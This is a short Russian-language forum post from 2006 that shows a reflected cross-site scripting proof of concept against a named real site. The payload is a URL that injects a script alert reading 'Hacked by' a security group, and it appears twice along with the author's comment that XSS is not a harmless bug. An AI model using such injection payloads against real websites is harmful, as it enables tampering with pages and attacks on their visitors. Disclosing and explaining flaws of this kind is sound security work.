drmist
05.03.2006, 19:00
Вот так он выглядит:
http://astalavista.com/index.php/"><script>alert("Hacked by www.security-teams.net group");</script>
Если кто-то думает, что XSS это не существенный баг, которым ничего никому нельзя сделать, а потому следует закрыть на него глаза - читаем мою старенькою статейку:
http://www.security-teams.net/index.php?showtopic=2492
http://astalavista.com/index.php/"><script>alert("Hacked by www.security-teams.net group");</script>
Если кто-то думает, что XSS это не существенный баг, которым ничего никому нельзя сделать, а потому следует закрыть на него глаза - читаем мою старенькою статейку:
http://www.security-teams.net/index.php?showtopic=2492